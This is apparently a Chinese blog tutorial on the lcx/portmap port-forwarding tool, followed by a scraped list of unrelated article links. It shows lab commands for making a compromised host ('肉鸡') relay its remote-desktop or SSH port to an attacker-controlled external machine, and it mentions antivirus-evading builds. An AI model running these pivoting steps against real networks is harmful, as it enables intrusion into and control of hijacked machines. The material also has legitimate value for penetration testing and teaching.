Linux版lcx端口转发工具使用

0x01 前言

在实际情况中,web应用服务通常会被运行在内网机器上,然后通过端口映射到外网,供外网用户进行访问。如果我们已经攻破网站,拿到内网机器权限,通常会安装反弹木马到自己的外网主机,然后在外网主机进行操作。但是,这样操作就会变得很繁琐,需要从自己的内网机登陆到外网主机,然后控制外网主机来对肉鸡进行操作。而lcx端口转发工具可以帮助我们减轻一些负担。

0x02 lcx简介

lcx是一款端口转发工具,可以将肉鸡的某个端口转发到我们自己的外网主机上的某个端口,然后我们只需在内网机访问外网主机的端口达到访问肉鸡相应端口的效果。比如说,肉鸡A开了3389端口,我们将它转发到自己的外网机B的55端口,那么我们在内网的机器C通过访问B的55端口,就可以连接到A的远程桌面。

0x03 lcx通信过程

假设外网机B在111端口监听来自肉鸡A的消息,在55端口监听来自内网机C的消息。过程大致如下:肉鸡A主动连接外网机B的111端口,外网机B将从111端口接收的数据转到55端口,同样,也将从55端口接收到的数据转到111端口,111端口接收到的数据再传给肉鸡A的3389端口,肉鸡A的3389端口的数据也可以转给外网机B的111端口。那么,我们在内网机C通过访问外网机B的55端口就可以与肉鸡A的3389端口建立起通信,访问到A的远程桌面。

0x04 lcx使用介绍

lcx有windows版和linux版两个版本,这两个版本的lcx都具有三个功能:监听;转发;端口转向。在使用lcx时必须保证两个前提,肉鸡A和内网机C都能够访问到外网机B;listen监听的端口之前不能被其它程序占用。Linux版的使用与Windows版大同小异,都是先在外网机B进行监听,之后在肉鸡A进行转发,然后在内网机C进行访问。所不同的是,在转发过程中,Windows版的转发命令”-slave”命令后紧接的是外网机B的ip和端口号,然后再跟肉鸡A的ip和端口号,形如:lcx -slave IP(B) Port(B)  IP(A) port(A);而linux版的对应的转发命令形如: ./portmap -m 3 – h1 IP(A) -p1 port(A) -h2 IP(B) -p2 port(B)。portmap为自己编译源文件生成的文件名。linux版的method 2对应的windows版的listen功能,即监听功能,method 1对应的是tran功能,即端口转向功能。我们常用到的是listen功能和转发功能slave。

图1 Windows版操作命令

图2 Linux版操作命令

0x05 lcx操作实例

全windows下的操作网上有很多文章教程,这里不再重复。主要演示以下三种: tran功能;linux监听,windows转发;windows监听,linux转发。windows主机地址192.168.91.129,linux主机地址192.168.91.134。

1、 tran功能

tran功能是端口转向功能,通过访问该端口可以直接与该主机或另一台主机的某一个端口进行通信。比如,肉鸡A开启了3389端口,使用tran命令转向到肉鸡A的55端口,那么,我们访问肉鸡A的55端口就可以连接到肉鸡A的远程桌面。又比如,外网机B可以直接访问到肉鸡A的3389端口,我们使用tran将外网机B的3333端口转向到肉鸡A的3389端口,那么,我们通过访问外网机B的3333端口就可以连接到肉鸡A的远程桌面。

(1) 本机端口转向

命令:lcx -tran 55 127.0.0.1 3389

图3:本机端口转向

图4 本机端口转向效果

(2) 转向其他主机端口

命令:lcx -m 1 -p1 3333 -h2 192.168.91.129 -p2 3389

图5 转向其他主机端口

图6 转向其他主机端口效果

2、linux监听,windows转发

(1) linux监听:./portmap -m 2 -p1 2222 -p2 55

图7 linux监听

(2) windows转发:lcx -slave 192.168.91.134 2222  192.168.91.129 3389

图8 windows转发

(3) 测试结果

图9 测试结果

3、windows监听,linux转发

(1) windows监听:lcx -listen  111 55

图10 windows监听

(2) linux转发:./portmap -m 3 -h1 192.168.91.134 -p1 22 -h2 192.168.91.129 -p2 111

图11 linux转发

PS:我在测试的时候发现运行此命令会报错,但是结果确实会转发正确的,还请代码大神看看能不能改改源码解决解决啦~~

(3) 测试结果

图12 测试结果

0x06 结语

lcx在内网渗透过程中的作用还是很显而易见的,lcx的版本也是多种多样的,除了常规的windows版和linux版之外,还有jsp版及各种免杀版等等,针对不同的操作系统也有不同的版本,这个可以在今后根据实际情况进行收集使用。附件是测试时所用的windows版及linux版源码文件和编译后的文件。

参考链接

1、攻防实战:使用Lcx进行内网端口转发      http://sec.chinabyte.com/225/8848725.shtml

2、lcx.exe转发原理及其教程      http://blog.163.com/feiqiu_13/blog/static/16870088920107234210977/

3、lcx使用方法      http://whbill.blog.51cto.com/3280780/1537958

4、WEB渗透工具(4)-端口转发工具(Windows/Linux版lcx)      http://www.hackblog.cn/post/62.html

lcx端口转发工具的使用相关推荐

  1. 端口转发工具--lcx

    简介 lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口.它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款 ...

  2. 80端口攻击_内网端口转发工具的使用总结

    0x00 ew端口转发 0x01 portmap端口转发 0x02 htran端口转发 0x03 ssh端口转发 0x00 ew端口转发 环境准备 攻击机    win7(物理机) 192.168.3 ...

  3. Windows自带的端口转发工具netsh使用方法_DOS/BAT

    Windows自带的端口转发工具netsh使用方法_DOS/BAT 作者:用户 来源:互联网 时间:2017-02-22 17:24:30 netsh 端口转发 摘要: 下面的代码在windows下运 ...

  4. kubernetes入门到精通(二):k8s部署Tomcat集群,基于NTFS协议的文件集群共享,Service提供负载均衡,端口转发工具Rinetd配置外部访问

    首先,配置 Docker 镜像加速服务 登录阿里云账号,进入控制台 -> 容器镜像服务 (不需要有阿里云的服务器,只要注册账号即可) 在两台 node 节点上配置好阿里云的镜像加速. 重启一下 ...

  5. linux上用的端口转发工具,linux下最简单好用的的端口转发工具

    linux下最简单好用的的端口转发工具 解压安装 tar zxvf rinetd.tar.gz make make install 编辑配置 vi /etc/rinetd.conf 0.0.0.0 8 ...

  6. python3 QT5 端口转发工具 增加最小化隐藏 托盘显示 点击托盘恢复及托盘菜单

    原版  python3 QT5 端口转发工具_firseve的专栏-CSDN博客 # -*- coding: utf-8 -*-# 制作本地可执行文件 # pyinstaller -F -i ico. ...

  7. linux下最简单的端口转发工具rinetd实现端口转发

    在Linux系统中大多数情况选择用iptables来实现端口转发,iptables虽然强大,但配置不便,而且新手容易出错.在此分享另一个TCP/UDP端口转发工具rinetd,rinetd体积小巧,配 ...

  8. 端口转发工具ngr0k

    ngrok是一个内网端口转发工具,官方介绍:https://ngrok.com/product(有被墙可能) ngrok分为免费版和付费版,免费版只需要到ngrok网站注册一个账号即可使用,只不过在功 ...

  9. portmap全网最稳定的端口转发工具

    portmap.exe ,经测试全网最稳定的端口转发工具.连续测试1个多月不会自动关闭,效率很高.相比很多端口转发工具,目前只发现这个最好用. http://traffic189.com/f-22.h ...

最新文章

  1. Mybatis自定义排序
  2. 用navixt连接mysql连接不上_AMD神秘新显卡现身CompuBench数据库,可能是7nm Navi
  3. Server.Transfer VS Response.Redirect
  4. micropython随笔-hello,world
  5. 浅谈街霸的帧数据 (一):frame data
  6. 一次短信验证码攻击的应急响应
  7. ABAP和Java的单元测试Unit Test
  8. java学习(73):GUL网格布局管理器
  9. rap2检测哪些接口在使用_Apifox for Mac(接口调试管理工具)
  10. 机器学习真的可以起作用吗?(1)
  11. 性能测试:基础(5)
  12. 小鹏汽车又有高管加盟,这次是前一汽技术研发院副院长刘明辉
  13. 代码修改以及公式推导
  14. Java架构学习(三十三)ActivityMQ基础消息中间件概述异步与同步MQ作用MQ件通讯方式MQ应用场景ActivityMQ安装使用ActivityMQ的案例主题和订阅
  15. 计算机科学技术编程基础教程
  16. 2016-2017 华为中兴笔试+测评+技术面+综合二面+洽谈经验
  17. 天线远场定义_暗室静区及天线近场和远场的介绍
  18. 用图形编程编写国际象棋游戏
  19. 结合NBA主题,Niantic再寻LBS AR游戏破局之道
  20. 浅谈综述论文:文献综述

热门文章

  1. 使用二分法来解决的一些问题
  2. java 根据经纬度坐标查询出来附近店铺
  3. 关于微信分享 签名不一致的问题解决
  4. 简记 2022/9/2
  5. LSA(潜在语义分析)
  6. 数据结构和算法——kd树
  7. 【Nginx】Nginx主机域名配置
  8. 【干货】MySQL底层架构设计,你了解多少?
  9. Java中多继承的实现
  10. Linux CentOS7 VMware LAMP架构Apache用户认证、域名跳转、Apache访问日志